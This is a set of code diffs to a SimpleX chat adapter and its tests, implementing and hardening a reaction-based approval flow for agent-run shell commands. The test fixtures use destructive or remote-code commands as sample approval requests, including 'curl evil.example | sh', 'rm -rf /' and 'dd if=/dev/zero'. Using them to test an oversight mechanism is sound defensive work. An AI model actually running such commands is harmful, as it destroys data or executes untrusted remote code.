@@ -1433,6 +1458,17 @@ class SimplexAdapter(BasePlatformAdapter):
             self._approval_prompt_by_session[session_key] = item_id
             registered = True
 
+            if self._approval_entry_gen.get(session_key, 0) != entry_gen:
+                # Another approval for this session entered while the prompt
+                # send above was in flight. That entrant saw this call and
+                # went typed-only — but this prompt was composed against a
+                # queue that has since grown, so a tap on it could resolve a
+                # different command than the one it shows. Withdraw it and
+                # hold the session to the typed lane.
+                self._retire_live_prompt_for_session(session_key)
+                self._mark_session_typed_only(session_key)
+                return SendResult(success=True, message_id=item_id)
+
             if seed:
                 # Seed detached: every /_reaction waits on a correlated daemon
                 # reply, and gateway/run.py only allows send_exec_approval 15
@@ -1447,6 +1483,15 @@ class SimplexAdapter(BasePlatformAdapter):
         finally:
             if not registered:
                 self._mark_session_typed_only(session_key)
+            remaining = self._approval_inflight.get(session_key, 0) - 1
+            if remaining > 0:
+                self._approval_inflight[session_key] = remaining
+            else:
+                # Last one out drops both entries: every overlap check
+                # snapshots at entry and compares while in flight, so the
+                # counter has no meaning once nobody is.
+                self._approval_inflight.pop(session_key, None)
+                self._approval_entry_gen.pop(session_key, None)
 
     async def _send_approval_message(
         self,

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -1512,19 +1512,33 @@ class SimplexAdapter(BasePlatformAdapter):
         contact whose display name is not literally its numeric id
         (verified against simplex-chat v7.0.0.11: ``@3 hi`` →
         ``chatCmdError/contactNotFound``). :meth:`send` has since moved to
-        the structured form on main, so both paths now address by id; this
-        helper remains as the approval flow's self-contained send path and
-        the home of the display-name fallback below. A user who taps ✅
+        the structured form on main — unconditionally, which the daemon
+        rejects for display-name-addressed chats (see the fallback branch
+        below). This helper is therefore the approval flow's self-contained
+        send path for BOTH cases: structured for numeric refs, bare for
+        name-addressed chats. A user who taps ✅
         and sees no reply reads the tap
         as broken, so the approval flow must not depend on that branch.
 
         Chats with no numeric ``ChatRef`` — DMs addressed by display name —
-        fall back to :meth:`send`, which is the form that addresses them
-        correctly.
+        get the bare chat-command form composed inline below, because the
+        daemon rejects the structured form for them and :meth:`send` now
+        emits the structured form unconditionally.
         """
         chat_ref = self._chat_ref(chat_id)
         if not chat_ref:
-            return await self.send(chat_id, text, metadata=metadata)
+            # Display-name-addressed chat. The daemon REJECTS the structured
+            # form for these (``/_send @<name> json …`` → ``commandError:
+            # Failed reading: empty`` — verified live against v7.0.0.11,
+            # 2026-08-09), and :meth:`send` now composes the structured form
+            # unconditionally, so delegating there would lose the message
+            # outright. The bare chat-command form is the one the daemon
+            # accepts for name-addressed chats; its known limitation (the
+            # display-name lookup) is strictly better than a guaranteed
+            # rejection. Approval-flow messages must reach the chat, so the
+            # bare form is deliberate here.
+            await self._send_fire_and_forget(f"@{chat_id} {text}")
+            return SendResult(success=True)
         composed = json.dumps([{"msgContent": {"type": "text", "text": text}}])
         await self._send_fire_and_forget(f"/_send {chat_ref} json {composed}")
         return SendResult(success=True)

--- a/plugins/platforms/simplex/adapter.py
+++ b/plugins/platforms/simplex/adapter.py
@@ -203,6 +203,15 @@ def _is_audio_ext(ext: str) -> bool:
     return ext.lower() in {".mp3", ".wav", ".ogg", ".m4a", ".aac", ".opus"}
 
 
+class _SimplexCommandSendError(Exception):
+    """The command never reached the daemon — the WebSocket write failed.
+
+    Distinct from "no reply came back". A timeout leaves the command
+    possibly delivered; this means it certainly was not, so a caller must
+    not report the message it carried as sent.
+    """
+
+
 @dataclass
 class _SimplexApprovalPrompt:
     """Tracks a pending SimpleX reaction-based exec approval prompt.
@@ -898,12 +907,26 @@ class SimplexAdapter(BasePlatformAdapter):
             logger.warning("SimpleX: WS send error: %s", e)
 
     async def _send_command(
-        self, command: str, timeout: float = 30.0
+        self,
+        command: str,
+        timeout: float = 30.0,
+        *,
+        raise_on_send_error: bool = False,
     ) -> Optional[dict]:
-        """Send a command and await the correlated response."""
+        """Send a command and await the correlated response.
+
+        ``None`` means "no answer came back", which by default covers both a
+        reply timeout (the daemon very likely got the command) and a write
+        that raised (it certainly did not). Callers that have to tell those
+        apart — anything reporting delivery to a user — pass
+        ``raise_on_send_error=True`` and get :class:`_SimplexCommandSendError`
+        for the write failure instead of an indistinguishable ``None``.
+        """
         ws = self._ws
         if not ws:
             logger.warning("SimpleX: command sent but WebSocket not connected")
+            if raise_on_send_error:
+                raise _SimplexCommandSendError("WebSocket not connected")
             return None
 
         corr_id = self._make_corr_id()
@@ -914,17 +937,27 @@ class SimplexAdapter(BasePlatformAdapter):
         self._pending_responses[corr_id] = fut
 
         try:
-            await ws.send(payload)
+            try:
+                await ws.send(payload)
+            except Exception as e:
+                logger.warning(
+                    "SimpleX: command not sent: %s — %s", command[:50], e
+                )
+                if raise_on_send_error:
+                    raise _SimplexCommandSendError(str(e)) from e
+                return None
             result = await asyncio.wait_for(fut, timeout=timeout)
             return result
         except asyncio.TimeoutError:
             logger.warning("SimpleX: command timed out: %s", command[:50])
-            self._pending_responses.pop(corr_id, None)
             return None
+        except _SimplexCommandSendError:
+            raise
         except Exception as e:
             logger.warning("SimpleX: command failed: %s — %s", command[:50], e)
-            self._pending_responses.pop(corr_id, None)
             return None
+        finally:
+            self._pending_responses.pop(corr_id, None)
 
     async def _send_fire_and_forget(self, command: str) -> None:
         """Send a command without waiting for a correlated response.
@@ -1106,11 +1139,13 @@ class SimplexAdapter(BasePlatformAdapter):
         ``itemId`` for the message it decorates.
 
         ``delivered`` is False when the send was never attempted (no live
-        WebSocket) or when the daemon answered with an explicit error — both
-        cases mean the user will see nothing, so the caller must fail and let
-        ``gateway/run.py`` post its own plain-text prompt. A *timeout* is
-        different: the message is possibly delivered, so the caller reports
-        success and skips the reactions rather than double-posting.
+        WebSocket), when the write itself raised (the connection died between
+        the check and the write), or when the daemon answered with an explicit
+        error — all three mean the user will see nothing, so the caller must
+        fail and let ``gateway/run.py`` post its own plain-text prompt. A
+        *timeout* is different: the message is possibly delivered, so the
+        caller reports success and skips the reactions rather than
+        double-posting.
         """
         if not self._ws:
             logger.warning(
@@ -1118,10 +1153,20 @@ class SimplexAdapter(BasePlatformAdapter):
             )
             return None, False
         composed = json.dumps([{"msgContent": {"type": "text", "text": text}}])
-        resp = await self._send_command(
-            f"/_send {chat_ref} json {composed}",
-            timeout=ANCHORED_SEND_TIMEOUT_SECONDS,
-        )
+        try:
+            resp = await self._send_command(
+                f"/_send {chat_ref} json {composed}",
+                timeout=ANCHORED_SEND_TIMEOUT_SECONDS,
+                raise_on_send_error=True,
+            )
+        except _SimplexCommandSendError:
+            # The write failed, so nothing was delivered. Reporting this as
+            # sent would leave the user with no prompt at all for a command
+            # still queued in core.
+            logger.warning(
+                "SimpleX: approval prompt not sent — WebSocket write failed"
+            )
+            return None, False
         if resp is None:
             return None, True
         if resp.get("type") == "chatCmdError":
@@ -1246,6 +1291,12 @@ class SimplexAdapter(BasePlatformAdapter):
         a direct chat with exactly one live approval. Groups and concurrent
         approvals fall back to the typed lane — see the guards below.
 
+        Every exit that does not end with a registered prompt holds the
+        session to the typed lane for one approval window, because
+        ``tools/approval`` has already queued the approval by the time this
+        runs: an unregistered prompt is a pending command the single-prompt
+        guard cannot see.
+
         *command* arrives already credential-redacted from ``gateway/run.py``
         — do not re-redact it and do not log it.
         """
@@ -1270,59 +1321,95 @@ class SimplexAdapter(BasePlatformAdapter):
         if self._retire_live_prompt_for_session(session_key) or (
             self._typed_only_sessions.get(session_key, 0.0) > now
         ):
-            self._typed_only_sessions[session_key] = now + _approval_prompt_ttl()
             queued = True
         else:
             queued = False
 
-        chat_ref = self._chat_ref(chat_id)
-        # v1 keeps the reaction lane to direct chats. In a group, any member
-        # can react, and the only identity the daemon hands us for a group
-        # reactor is one this adapter cannot yet tie to a verified operator.
-        # Groups get the typed lane, which the gateway authorizes properly.
-        reaction_lane = (
-            bool(chat_ref) and not self._is_group_chat(chat_id) and not queued
-        )
-        # Seeding is a separate capability from the inbound lane: a daemon
-        # that refuses to let the bot place a reaction has not said anything
-        # about reactions a *user* places.
-        seed = reaction_lane and self._reactions_supported is not False
-
-        text = self._format_simplex_exec_approval(
-            command, description, smart_denied, choices, show_legend=seed
-        )
-        if not reaction_lane:
-            return await self.send(chat_id, text, metadata=metadata)
-
-        item_id, delivered = await self._send_anchored_text(str(chat_ref), text)
-        if not delivered:
-            # Let gateway/run.py fall back to its own plain-text prompt.
-            return SendResult(
-                success=False, error="SimpleX daemon rejected the approval prompt"
+        # Anything short of a registered prompt below leaves an approval
+        # pending in core with no tappable message of its own, so the
+        # session is held to the typed lane by the ``finally``. That covers
+        # the WebSocket being down, the write raising, the daemon rejecting
+        # or not answering the send, a group or display-name-addressed chat,
+        # and an exception escaping into gateway/run.py's text fallback.
+        registered = False
+        try:
+            chat_ref = self._chat_ref(chat_id)
+            # v1 keeps the reaction lane to direct chats. In a group, any
+            # member can react, and the only identity the daemon hands us for
+            # a group reactor is one this adapter cannot yet tie to a verified
+            # operator. Groups get the typed lane, which the gateway
+            # authorizes properly.
+            reaction_lane = (
+                bool(chat_ref) and not self._is_group_chat(chat_id) and not queued
             )
-        if not item_id:
-            # The prompt is out but unanchored; its typed instructions work.
-            return SendResult(success=True)
+            # Seeding is a separate capability from the inbound lane: a daemon
+            # that refuses to let the bot place a reaction has not said
+            # anything about reactions a *user* places.
+            seed = reaction_lane and self._reactions_supported is not False
 
-        prompt = _SimplexApprovalPrompt(
-            session_key=session_key,
-            chat_id=chat_id,
-            chat_ref=str(chat_ref),
-            item_id=item_id,
-            choices=frozenset(choice for _emoji, choice, _label in choices),
-            expires_at=time.monotonic() + _approval_prompt_ttl(),
-        )
-        self._approval_prompts_by_item[item_id] = prompt
-        self._approval_prompt_by_session[session_key] = item_id
+            text = self._format_simplex_exec_approval(
+                command, description, smart_denied, choices, show_legend=seed
+            )
+            if not reaction_lane:
+                return await self.send(chat_id, text, metadata=metadata)
 
-        if seed:
-            # Seed detached: every /_reaction waits on a correlated daemon
-            # reply, and gateway/run.py only allows send_exec_approval 15
-            # seconds before it abandons the button lane. Prompt state is
-            # already registered, so a reaction that beats the seeding still
-            # correlates.
-            self._spawn_background(self._seed_approval_reactions(prompt, choices))
-        return SendResult(success=True, message_id=item_id)
+            item_id, delivered = await self._send_anchored_text(str(chat_ref), text)
+            if not delivered:
+                # Let gateway/run.py fall back to its own plain-text prompt.
+                return SendResult(
+                    success=False,
+                    error="SimpleX daemon rejected the approval prompt",
+                )
+            if not item_id:
+                # The prompt is out but unanchored; its typed instructions
+                # work, and its reaction legend is a dud — nothing correlates
+                # a tap on a message whose item id we never learned.
+                return SendResult(success=True)
+
+            prompt = _SimplexApprovalPrompt(
+                session_key=session_key,
+                chat_id=chat_id,
+                chat_ref=str(chat_ref),
+                item_id=item_id,
+                choices=frozenset(choice for _emoji, choice, _label in choices),
+                expires_at=time.monotonic() + _approval_prompt_ttl(),
+            )
+            self._approval_prompts_by_item[item_id] = prompt
+            self._approval_prompt_by_session[session_key] = item_id
+            registered = True
+
+            if seed:
+                # Seed detached: every /_reaction waits on a correlated daemon
+                # reply, and gateway/run.py only allows send_exec_approval 15
+                # seconds before it abandons the button lane. Prompt state is
+                # already registered, so a reaction that beats the seeding
+                # still correlates.
+                self._spawn_background(
+                    self._seed_approval_reactions(prompt, choices)
+                )
+            return SendResult(success=True, message_id=item_id)
+        finally:
+            if not registered:
+                self._mark_session_typed_only(session_key)
+
+    def _mark_session_typed_only(self, session_key: str) -> None:
+        """Refuse the tap lane for *session_key* for one approval window.
+
+        ``tools/approval`` queues an approval entry *before* it notifies the
+        adapter, so any ``send_exec_approval`` call that ends without a
+        registered prompt still leaves a command pending in core — one the
+        single-live-prompt guard cannot see and the user may never have been
+        shown. A later prompt in the same session would then look
+        unambiguous, and a tap on it would resolve the FIFO head: the older,
+        unseen command. Holding the session typed-only until every entry that
+        could still be queued has timed out is the same principle the
+        pile-up latch applies, extended to the paths where nothing was sent.
+
+        Never shortens an existing window.
+        """
+        deadline = time.monotonic() + _approval_prompt_ttl()
+        if self._typed_only_sessions.get(session_key, 0.0) < deadline:
+            self._typed_only_sessions[session_key] = deadline
 
     def _sweep_expired_prompts(self) -> None:
         """Retire every prompt whose tap window has closed."""

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -398,17 +398,24 @@ def _choice_table():
     return _simplex._APPROVAL_CHOICES
 
 
-def _approval_adapter(reaction_response=None, item_id=501, reject_emoji=None):
+def _approval_adapter(
+    reaction_response=None, item_id=501, reject_emoji=None, reaction_cap=None
+):
     """Adapter plus a fake daemon that records every command it is sent.
 
     ``/_send`` answers with a ``newChatItems`` reply carrying *item_id* so
     the approval prompt has an anchor; ``/_reaction`` answers with
     *reaction_response* (default: accepted), or with a command error for the
     single emoji named in *reject_emoji*.
+
+    *reaction_cap* models the real daemon's per-sender reaction limit
+    (three on simplex-chat v7.0.0.11): once that many reactions are held on
+    an item, the next ``on`` answers ``commandError: "too many reactions"``.
     """
     adapter = _adapter_with_ws()
     sent = []
     timeouts = {}
+    held = {}
 
     async def fake_send_command(command, timeout=30.0, **_kwargs):
         sent.append(command)
@@ -426,6 +433,21 @@ def _approval_adapter(reaction_response=None, item_id=501, reject_emoji=None):
         if command.startswith("/_reaction "):
             if reject_emoji is not None and f'"{reject_emoji}"' in command:
                 return {"type": "chatCmdError", "chatError": {}}
+            if reaction_cap is not None:
+                item = command.split(" ")[2]
+                on = " on " in command
+                if on and held.get(item, 0) >= reaction_cap:
+                    return {
+                        "type": "chatCmdError",
+                        "chatError": {
+                            "type": "error",
+                            "errorType": {
+                                "type": "commandError",
+                                "message": "too many reactions",
+                            },
+                        },
+                    }
+                held[item] = held.get(item, 0) + (1 if on else -1)
             if reaction_response is not None:
                 return reaction_response
             return {"type": "chatItemReaction", "added": True}
@@ -456,12 +478,31 @@ def _prompt_text(sent):
     return composed[0]["msgContent"]["text"]
 
 
-def _ws_texts(adapter):
-    """Every plain (non-anchored) message the adapter pushed at the socket."""
+def _ws_frames(adapter):
+    """Every raw command the adapter pushed straight at the socket."""
     return [
         json.loads(call[0][0])["cmd"]
         for call in adapter._ws.send.call_args_list
     ]
+
+
+def _ws_texts(adapter):
+    """Message bodies the adapter pushed at the socket, decoded.
+
+    Both outbound forms are unwrapped: the structured ``/_send <ref> json``
+    payload the approval flow uses, and the bare ``@<name> <text>`` form
+    ``send()`` still uses when a chat has no numeric ChatRef.
+    """
+    texts = []
+    for cmd in _ws_frames(adapter):
+        if cmd.startswith("/_send ") and " json " in cmd:
+            composed = json.loads(cmd.split(" json ", 1)[1])
+            texts.append(composed[0]["msgContent"]["text"])
+        elif cmd[:1] in ("@", "#"):
+            texts.append(cmd.split(" ", 1)[1] if " " in cmd else "")
+        else:
+            texts.append(cmd)
+    return texts
 
 
 def _reaction_commands(sent, toggle="on"):
@@ -563,10 +604,10 @@ async def test_exec_approval_anchors_prompt_and_seeds_reactions():
 
 @pytest.mark.asyncio
 async def test_exec_approval_legend_matches_seeded_emoji():
-    """Every advertised reaction is one the bot tried to place.
+    """Every advertised reaction is one that is actually on the message.
 
-    Generating the legend text and the seed set from one table is what keeps
-    them from drifting apart.
+    The legend is written from the taps that landed, not from the table the
+    seeder worked off, so the two cannot drift apart.
     """
     adapter, sent = _approval_adapter()
     await adapter.send_exec_approval(
@@ -574,8 +615,12 @@ async def test_exec_approval_legend_matches_seeded_emoji():
     )
     await _drain(adapter)
 
-    text = _prompt_text(sent)
-    advertised = {emoji for emoji, _c, _l in _choice_table() if f"{emoji} = " in text}
+    # The prompt itself never carries a legend — it goes out before the
+    # daemon has said which reactions it accepted.
+    assert "tap a reaction" not in _prompt_text(sent)
+
+    legend = [t for t in _ws_texts(adapter) if "tap a reaction" in t][0]
+    advertised = {emoji for emoji, _c, _l in _choice_table() if f"{emoji} = " in legend}
     seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
     assert advertised == seeded
     assert advertised
@@ -1406,9 +1451,11 @@ async def test_one_refused_emoji_does_not_kill_the_whole_lane():
     await _drain(adapter)
 
     assert adapter._reactions_supported is True
-    seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
-    assert seeded == {"✅", "🚀", "❤", "👎"}
-    assert adapter._approval_prompts_by_item["501"].seeded_emoji == ["✅", "❤", "👎"]
+    attempted = {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    assert attempted == {"👎", "✅", "🚀"}
+    assert adapter._approval_prompts_by_item["501"].seeded_emoji == ["👎", "✅"]
+    legend = [t for t in _ws_texts(adapter) if "tap a reaction" in t][0]
+    assert "🚀" not in legend
 
 
 @pytest.mark.asyncio
@@ -1434,7 +1481,7 @@ async def test_a_seed_that_lands_after_resolution_is_taken_back_off():
         calls.append((emoji, add))
         if add:
             await gate.wait()
-        return True
+        return _simplex._REACTION_ACCEPTED
 
     adapter._set_reaction = fake_set_reaction
     task = asyncio.create_task(
@@ -1447,5 +1494,204 @@ async def test_a_seed_that_lands_after_resolution_is_taken_back_off():
     await task
     await _drain(adapter)
 
-    assert ("✅", False) in calls
+    assert (_choice_table()[0][0], False) in calls
     assert prompt.seeded_emoji == []
+
+
+# ---------------------------------------------------------------------------
+# 11e. The daemon's three-reaction cap
+# ---------------------------------------------------------------------------
+
+
+@pytest.mark.asyncio
+async def test_only_three_tap_targets_are_seeded_and_deny_goes_first():
+    """The daemon holds three reactions per sender, so we ask for three.
+
+    Measured against simplex-chat v7.0.0.11: seeding a fourth emoji comes
+    back ``commandError: "too many reactions"``. Seeding four meant the
+    fourth silently vanished — and it was 👎, the one choice a user must
+    never lose.
+    """
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    seeded = [_reaction_emoji(c) for c in _reaction_commands(sent)]
+    assert len(seeded) == 3
+    assert seeded[0] == "👎"
+    assert set(seeded) == {"👎", "✅", "🚀"}
+    assert "❤" not in seeded
+
+
+@pytest.mark.asyncio
+async def test_approve_always_is_typed_only_but_still_read_inbound(
+    resolved_approvals,
+):
+    """❤ is never seeded and never advertised, and still works by hand.
+
+    "Always" writes a permanent, global, on-disk allowlist entry — the most
+    consequential tier on the prompt — so it costs a typed command rather
+    than one tap.
+    """
+    calls, _state = resolved_approvals
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert "❤" not in {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    everything = _prompt_text(sent) + "\n".join(_ws_texts(adapter))
+    assert "❤" not in everything
+    # The typed route to the same tier is still spelled out.
+    assert "approve always" in _prompt_text(sent)
+
+    await adapter._handle_event(_reaction_event("❤️"))
+    assert calls == [("s", "always")]
+
+
+@pytest.mark.asyncio
+async def test_a_reaction_cap_never_costs_the_deny_target():
+    """A cap hit while seeding must not be the thing that removes 👎."""
+    adapter, sent = _approval_adapter(reaction_cap=2)
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    prompt = adapter._approval_prompts_by_item["501"]
+    assert "👎" in prompt.seeded_emoji
+    assert len(prompt.seeded_emoji) == 2
+    # A cap is not a refusal: the daemon still takes reactions from us.
+    assert adapter._reactions_supported is True
+    # Seeding stops at the cap instead of hammering the daemon.
+    assert len(_reaction_commands(sent)) == 3
+
+
+@pytest.mark.asyncio
+async def test_the_legend_lists_only_the_reactions_that_landed():
+    """The bot may never advertise a tap the user cannot see."""
+    adapter, sent = _approval_adapter(reaction_cap=2)
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    landed = adapter._approval_prompts_by_item["501"].seeded_emoji
+    legend = [t for t in _ws_texts(adapter) if "tap a reaction" in t]
+    assert len(legend) == 1
+    advertised = [e for e in ("👎", "✅", "🚀", "❤") if f"{e} = " in legend[0]]
+    assert advertised == landed
+
+
+@pytest.mark.asyncio
+async def test_no_legend_when_nothing_could_be_seeded():
+    """A daemon that placed no reaction gets no "tap a reaction" line."""
+    adapter, _sent = _approval_adapter(reaction_cap=0)
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert [t for t in _ws_texts(adapter) if "tap a reaction" in t] == []
+    assert adapter._approval_prompts_by_item["501"].seeded_emoji == []
+
+
+# ---------------------------------------------------------------------------
+# 11f. Our own sends do not ride the broken DM text path
+# ---------------------------------------------------------------------------
+
+
+def _bare_dm_frames(adapter):
+    """Frames sent as ``@<numeric id> <text>`` — the path that drops silently.
+
+    The daemon reads ``@x`` as a display-name lookup and answers
+    ``contactNotFound`` for any contact whose display name is not literally
+    its numeric id, while the send still reports success. Nothing in the
+    approval flow may depend on it.
+    """
+    return [
+        cmd for cmd in _ws_frames(adapter)
+        if cmd.startswith("@") and cmd.split(" ", 1)[0][1:].isdigit()
+    ]
+
+
+@pytest.mark.asyncio
+async def test_the_tap_acknowledgement_uses_the_structured_send_form(
+    resolved_approvals,
+):
+    """A tap that resolves must produce a message the user actually sees."""
+    _calls, _state = resolved_approvals
+    adapter, _sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+    adapter._ws.send.reset_mock()
+
+    await adapter._handle_event(_reaction_event("✅"))
+    await _drain(adapter)
+
+    acks = [t for t in _ws_texts(adapter) if "Approved" in t]
+    assert acks == ["✅ Approved — running this once."]
+    assert _bare_dm_frames(adapter) == []
+    assert all(
+        cmd.startswith("/_send @42 json ") for cmd in _ws_frames(adapter)
+    )
+
+
+@pytest.mark.asyncio
+async def test_every_approval_notice_uses_the_structured_send_form(
+    resolved_approvals,
+):
+    """Supersede, expiry, stale tap and bad-reaction replies, all of them."""
+    _calls, state = resolved_approvals
+    adapter, sent = _approval_adapter()
+
+    # Supersede notice + the typed prompt that replaces the tap lane.
+    await _two_prompts_one_session(adapter, sent)
+    # Bad-reaction feedback on the second (typed) prompt's predecessor.
+    adapter._next_item_id = 888
+    adapter._typed_only_sessions.clear()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/y", session_key="s2", description="delete"
+    )
+    await _drain(adapter)
+    await adapter._handle_event(_reaction_event("😂", item_id=888))
+    # Expiry notice.
+    adapter._approval_prompts_by_item["888"].expires_at = time.monotonic() - 1
+    await adapter._handle_event(_reaction_event("✅", item_id=888))
+    # Stale tap: nothing left pending.
+    adapter._next_item_id = 999
+    adapter._typed_only_sessions.clear()
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/z", session_key="s3", description="delete"
+    )
+    await _drain(adapter)
+    state["count"] = 0
+    await adapter._handle_event(_reaction_event("✅", item_id=999))
+    await _drain(adapter)
+
+    joined = "\n".join(_ws_texts(adapter))
+    assert "superseded" in joined
+    assert "not one of the approval options" in joined
+    assert "expired" in joined
+    assert "no longer pending" in joined
+    assert _bare_dm_frames(adapter) == []
+
+
+@pytest.mark.asyncio
+async def test_the_daemon_refusal_notice_uses_the_structured_send_form():
+    """Even the "this daemon will not let me react" line has to arrive."""
+    adapter, _sent = _approval_adapter(
+        reaction_response={"type": "chatCmdError", "chatError": {}}
+    )
+    await adapter.send_exec_approval(
+        chat_id="42", command="rm -rf /tmp/x", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert "does not let me place" in "\n".join(_ws_texts(adapter))
+    assert _bare_dm_frames(adapter) == []

--- a/tests/gateway/test_simplex_plugin.py
+++ b/tests/gateway/test_simplex_plugin.py
@@ -388,3 +388,471 @@ def _make_file_chat_item(file_path: str, file_name: str) -> dict:
     }
 
 
+# ---------------------------------------------------------------------------
+# 11. Reaction-based exec approvals
+# ---------------------------------------------------------------------------
+
+def _choice_table():
+    """The adapter's (emoji, choice, label) table, resolved at call time."""
+    return _simplex._APPROVAL_CHOICES
+
+
+def _approval_adapter(reaction_response=None, item_id=501):
+    """Adapter plus a fake daemon that records every command it is sent.
+
+    ``/_send`` answers with a ``newChatItems`` reply carrying *item_id* so
+    the approval prompt has an anchor; ``/_reaction`` answers with
+    *reaction_response* (default: accepted).
+    """
+    adapter = _adapter_with_ws()
+    sent = []
+
+    async def fake_send_command(command, timeout=30.0):
+        sent.append(command)
+        if command.startswith("/_send "):
+            return {
+                "type": "newChatItems",
+                "chatItems": [
+                    {
+                        "chatInfo": {"type": "direct"},
+                        "chatItem": {"meta": {"itemId": item_id}},
+                    }
+                ],
+            }
+        if command.startswith("/_reaction "):
+            if reaction_response is not None:
+                return reaction_response
+            return {"type": "chatItemReaction", "added": True}
+        return None
+
+    adapter._send_command = fake_send_command
+    return adapter, sent
+
+
+async def _drain(adapter):
+    """Await the adapter's detached reaction seed/cleanup tasks."""
+    for _ in range(10):
+        pending = [t for t in adapter._background_tasks if not t.done()]
+        if not pending:
+            return
+        await asyncio.gather(*pending, return_exceptions=True)
+
+
+def _prompt_text(sent):
+    """Pull the prompt body back out of the recorded ``/_send`` command."""
+    send_cmds = [c for c in sent if c.startswith("/_send ")]
+    assert send_cmds, "no /_send command was recorded"
+    composed = json.loads(send_cmds[-1].split(" json ", 1)[1])
+    return composed[0]["msgContent"]["text"]
+
+
+def _reaction_commands(sent, toggle="on"):
+    return [
+        c for c in sent
+        if c.startswith("/_reaction ") and f" {toggle} " in c
+    ]
+
+
+def _reaction_emoji(command):
+    return json.loads(command.split(" on ", 1)[1].split(" off ", 1)[-1])["emoji"]
+
+
+def _reaction_event(
+    emoji,
+    *,
+    item_id=501,
+    added=True,
+    dir_type="directRcv",
+    contact_id=42,
+    member=None,
+):
+    """A daemon ``chatItemReaction`` event in the documented ACIReaction shape."""
+    chat_dir = {"type": dir_type}
+    if member is not None:
+        chat_dir["groupMember"] = member
+    return {
+        "resp": {
+            "type": "chatItemReaction",
+            "added": added,
+            "reaction": {
+                "chatInfo": {
+                    "type": "direct",
+                    "contact": {
+                        "contactId": contact_id,
+                        "localDisplayName": "tester",
+                    },
+                },
+                "chatReaction": {
+                    "chatDir": chat_dir,
+                    "chatItem": {"meta": {"itemId": item_id}},
+                    "sentAt": "2026-01-01T00:00:00Z",
+                    "reaction": {"type": "emoji", "emoji": emoji},
+                },
+            },
+        }
+    }
+
+
+@pytest.fixture
+def resolved_approvals(monkeypatch):
+    """Capture calls into ``tools.approval.resolve_gateway_approval``.
+
+    The adapter imports it lazily inside the handler, so patching the module
+    attribute is what the real call site sees.
+    """
+    import tools.approval as approval_mod
+
+    calls = []
+    state = {"count": 1}
+
+    def fake_resolve(session_key, choice, *args, **kwargs):
+        calls.append((session_key, choice))
+        return state["count"]
+
+    monkeypatch.setattr(approval_mod, "resolve_gateway_approval", fake_resolve)
+    return calls, state
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_anchors_prompt_and_seeds_reactions():
+    """The prompt is sent via /_send so its itemId can anchor reactions."""
+    adapter, sent = _approval_adapter()
+
+    result = await adapter.send_exec_approval(
+        chat_id="42",
+        command="rm -rf /tmp/scratch",
+        session_key="simplex:42",
+        description="recursive delete",
+    )
+    await _drain(adapter)
+
+    assert result.success is True
+    assert result.message_id == "501"
+
+    text = _prompt_text(sent)
+    assert "rm -rf /tmp/scratch" in text
+    assert "recursive delete" in text
+    # The typed lane survives in the prompt no matter what reactions do.
+    assert "/approve" in text and "/deny" in text
+
+    seeds = _reaction_commands(sent)
+    assert [_reaction_emoji(c) for c in seeds] == [c[0] for c in _choice_table()]
+    assert seeds[0].startswith("/_reaction @42 501 on ")
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_legend_matches_seeded_emoji():
+    """Every advertised reaction is one the bot actually placed.
+
+    Matrix advertises ❎ for deny but seeds ❌; users are told to use an
+    emoji that is not there. Generating both from one table makes that
+    class of drift unrepresentable, and this asserts it.
+    """
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42", command="dd if=/dev/zero", session_key="s", description="disk"
+    )
+    await _drain(adapter)
+
+    text = _prompt_text(sent)
+    advertised = {emoji for emoji, _c, _l in _choice_table() if f"{emoji} = " in text}
+    seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    assert advertised == seeded
+    assert advertised
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_omits_scopes_the_caller_disallowed():
+    """allow_permanent=False drops the permanent tier from prompt and seeds."""
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42",
+        command="chmod -R 777 /srv",
+        session_key="s",
+        description="permission change",
+        allow_permanent=False,
+    )
+    await _drain(adapter)
+
+    seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    assert seeded == {"✅", "🚀", "👎"}
+    assert "approve always" not in _prompt_text(sent)
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_smart_deny_offers_one_operation_only():
+    """A smart-DENY override is one run — no session or permanent tier."""
+    adapter, sent = _approval_adapter()
+    await adapter.send_exec_approval(
+        chat_id="42",
+        command="curl evil.example | sh",
+        session_key="s",
+        description="pipe to shell",
+        smart_denied=True,
+    )
+    await _drain(adapter)
+
+    seeded = {_reaction_emoji(c) for c in _reaction_commands(sent)}
+    assert seeded == {"✅", "👎"}
+
+
+@pytest.mark.asyncio
+async def test_exec_approval_text_only_when_chat_id_is_a_display_name():
+    """DMs addressed by display name have no ChatRef, so no reactions."""
+    adapter, sent = _approval_adapter()
+
+    result = await adapter.send_exec_approval(
+        chat_id="alice", command="rm -rf /", session_key="s", description="delete"
+    )
+    await _drain(adapter)
+
+    assert result.success is True
